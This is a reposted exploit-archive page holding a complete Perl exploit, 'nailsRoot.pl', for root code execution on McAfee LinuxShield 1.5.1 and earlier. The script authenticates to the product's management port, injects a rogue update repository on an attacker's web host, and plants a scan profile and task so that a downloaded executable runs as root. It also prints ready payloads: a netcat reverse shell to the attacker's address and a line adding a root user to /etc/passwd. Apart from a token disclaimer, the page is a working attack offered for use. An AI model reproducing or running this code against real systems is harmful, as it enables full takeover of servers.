McAfee LinuxShield <= 1.5.1 Local/Remote Root Code Execution
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>McAfee LinuxShield <= 1.5.1 Local/Remote Root Code Execution</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================
McAfee LinuxShield <= 1.5.1 Local/Remote Root Code Execution
============================================================
#!/usr/bin/perl
##
# Title: McAfee LinuxShield <= 1.5.1 Local/Remote Root Exploit
# Name: nailsRoot.pl
# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
# WARNING: This Exploit deletes the default Update Server
#
# Use it only for education or ethical pentesting! The author accepts
# no liability for damage caused by this tool.
#
##
use strict;
use IO::Socket::SSL;
use Getopt::Std;
my %args;
my $ack;
my $timestamp;
getopt(‘h:p:u:v:e:a:g:’, %args);
my $gen_exec = $args{g};
if (defined $gen_exec) {
genEx($gen_exec);
}
my $target_host = $args{h} || usage();
my $target_port = $args{p} || 65443;
my $nails_user = $args{u} || usage();
my $nails_pass = $args{v} || "";
my $exec_path = $args{e} || "/opt/McAfee/cma/scratch/update/catalog.z";
my $my_host = $args{a} || "";
my $range = 50000000;
my $minimum = 90000000;
my $randomtask = int(rand($range)) + $minimum;
my $pre="sconf ODS_99 ";
my $post="x0dx0a";
my $setrepo1=’db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLis’.
‘ts xmlns:ns="naSiteList" GlobalVersion="20030131003110" LocalVersion="20091209161903" Type="Clie’.
‘nt"><SiteList Default="1" Name="SomeGUID"><HttpSite Type="repository" Name="EvilRepo" Order="1"’.
‘ Server="’;
my $setrepo2=’:80" Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAut’.
‘h><UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update’;
my $setsite="task setsitelist";
my $begin="begin";
my$set="set ";
my $profile=" nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60".
" nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS".
"_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.".
"ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.prof".
"ile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so".
" nailsd.profile.ODS_99.factoryInitT".
"mo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.p".
"rofile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nails".
"d.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quaran".
"tineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scan".
"Children=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profil".
"e.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=".
"$exec_path".
" nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.sl".
"owScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.pat".
"h=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all ".
"nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=".
"Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.pri".
"mary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeou".
"t=Pass nailsd.profile.ODS_99.action.error=Block";
my $commit="commit ";
my $setdb=" _table=schedule taskName=$randomtask taskType=On-Demand taskInfo=profileName=ODS_99,".
"paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert";
#update _where= i_taskId=2";
my $execupd="task nstart LinuxShield Update";
my $execute="task nstart $randomtask";
banner();
if ($exec_path eq "/opt/McAfee/cma/scratch/update/catalog.z") {
if ($my_host eq "") {
usage();
}
stOne();
}else{
stTwo();
}
sub stOne {
my $reposock = IO::Socket::SSL->new(
PeerAddr => $target_host,
PeerPort => $target_port,
Proto => ‘tcp’,
);
if (defined $reposock) {
print "[*] Executing Stage Onen";
print "———————–n";
$ack=<$reposock>;
print $ack;
print $reposock "auth ".$nails_user." ".$nails_pass.$post;
$ack=<$reposock>;
if ($ack=~m/ERR authentication failure/){
print "[-] Authentication failed…n";
exit(1);
}
print $ack;
sleep(1);
print "[+] Repo update: inject evil repon";
print $reposock $setrepo1.$my_host.$setrepo2.$post;
sleep(1);
print "[+] Repo Site update: update site taskn";
print $reposock $setsite.$post;
$ack=<$reposock>;
print $ack;
sleep(1);
print "[+] Execute AV Update: downloading evil coden";
print $reposock $execupd.$post;
sleep(5); # Update needs a bit time
$reposock->shutdown(1);
}
stTwo();
}
sub stTwo {
my $sock = IO::Socket::SSL->new(
PeerAddr => $target_host,
PeerPort => $target_port,
Proto => ‘tcp’,
);
if (defined $sock) {
print "nn[*] Executing Stage TWOn";
print "———————–n";
$ack=<$sock>;
print $ack;
print $sock "auth ".$nails_user." ".$nails_pass.$post;
$ack=<$sock>;
if ($ack=~m/ERR authentication failure/){
print "[-] Authentication failed…n";
exit(1);
}
print $ack;
sleep(1);
print $sock $pre.$begin.$post;
$ack=<$sock>;
print $ack;
$ack=~s/+OK //g;
$timestamp=$ack;
$timestamp=~ s/s+$//;
print "[+] Timestamp: $timestampn";
print "[+] Profile: Injecting evil Profilen";
print $sock $pre.$set.$timestamp.$profile.$post;
sleep(1);
print "[+] Commit: Profile changesn";
print $sock $pre.$commit.$timestamp.$post;
sleep(1);
print "[+] Schedule: Injecting evil task $randomtaskn";
print $sock "db set ".$timestamp.$setdb.$post;
sleep(1);
print "[+] Excute: Task $randomtaskn";
print $sock $execute.$post;
$sock->shutdown(1);
print "[+] Done… Check whatever you didn";
} else {
print "[-] some troubles with connection: $!n" ;
}
}
sub usage {
print "n";
print " nailsRoot.pl – McAfee LinuxShield local/remote Root Exploitn";
print "===============================================================nn";
print " Usage:n";
print " $0 -h <target ip> -u <user> -v <pass> [-a <my host>|-e <executable>]n";
print " Optional:n";
print " -a <attacker host with httpd>n";
print " -e <executable file on target host>n";
print " -p <target port (default: 65443)>n";
print " -g (1|2) <generat shell scripts to execute>n";
print " 1 <UID 0 user add>n";
print " 2 <reverse nc shell>n";
print " Notes:n";
print " -We can not handle arguments given to executablen";
print " in the -e option.n";
print " -To download your own evil executable, start a httpdn";
print " and set the -a option. Create the directory <nai> inn";
print " your wwwroot and rename your executable to <catalog.z>n";
print " Author:n";
print " Nikolas Sotiriu (lofi)n";
print " url: www.sotiriu.den";
print " mail: lofi[at]sotiriu.den";
print "n";
exit(1);
}
sub genEx {
my ($code)=@_;
if ($code==1) {
print STDERR << "EOF";
============== UID 0 user add ==============
Copy this lines to the catalog.z file.
USER=haxxor PASS=haxxorPass
————– cut ————–
#!/bin/sh
echo haxxor:AzFQk89Xgpp8s:0:0::/:/bin/sh >> /etc/passwd
————– /cut ————–
EOF
} elsif ($code==2) {
print STDERR << "EOF";
============== reverse nc shell ==============
Copy this lines to the catalog.z file.
————– cut ————–
#!/bin/sh
nc -nv <yourip> 4444 -e /bin/sh
————– /cut ————–
EOF
}
exit(1);
}
sub banner {
print STDERR << "EOF";
——————————————————————————–
nailsRoot.pl – McAfee LinuxShield local/remote Root Exploit
——————————————————————————–
111 1111111
11100 101 00110111001111
11101 11 10 111 101 1001111111
1101 11 00 10 11 11 111 1111111101
10111 1 10 11 10 0 10 1 1 1 1111111011
1111 1 1 10 0 01 01 01 1 1 111 1111011101
1000 0 11 10 10 0 10 11 111 11111 11 1111 111100
1111111111 01 10 10 11 01 0 11 11111111111 1 1111 11
10111110 0 01 00 11 1110 11 10 11111111111 11 11111 11 111
101111111 0 10 01 11 1 11 0 10 11 1111111111111111 1111110000111
011111 0110 10 10 0 11 1 11 01 01 111111111111111 1 11110011001
1011111 0110 10 11 1110 11 1 10 11111111111111111111 1 100 001
1011111 0 10 10 01 1 0 1 11 1 111111111111111111111111 001101
011111 0 0 0 11 0 1111 0 11 01111111111111111111111111 01
1111111 01 01 111 1 1111 1 11 1111111111111111111111 1101 1111
111 1111 10 0 111110 0111 0 1 0111111111111111111111 11111 1111
111 11111 1 11 1 1 1 111 11 11111111111111111111111110 1001
111 1011111 1 11111111110111111111111111111111111111111 01 10111001
11 1100 10110110 10001 11101111111111111111 10 111 11100
111 00 1011101 00101 0 11111111111111111001 11 111101
11 00 00 101 1000011 1011 1111 1111111000 1111111 0
11 00 0 1011 100001 101000 1 1001 00001111 01
01101 11111 1011 01100 0101 110 11 10
10111 1 0 01 0000011 10 10
10011 11100 1111 101 11
1110 01 101011 1001100
1111000011 1 111
11000001111
1
EOF
}
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-08-27]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13886
Leave a Reply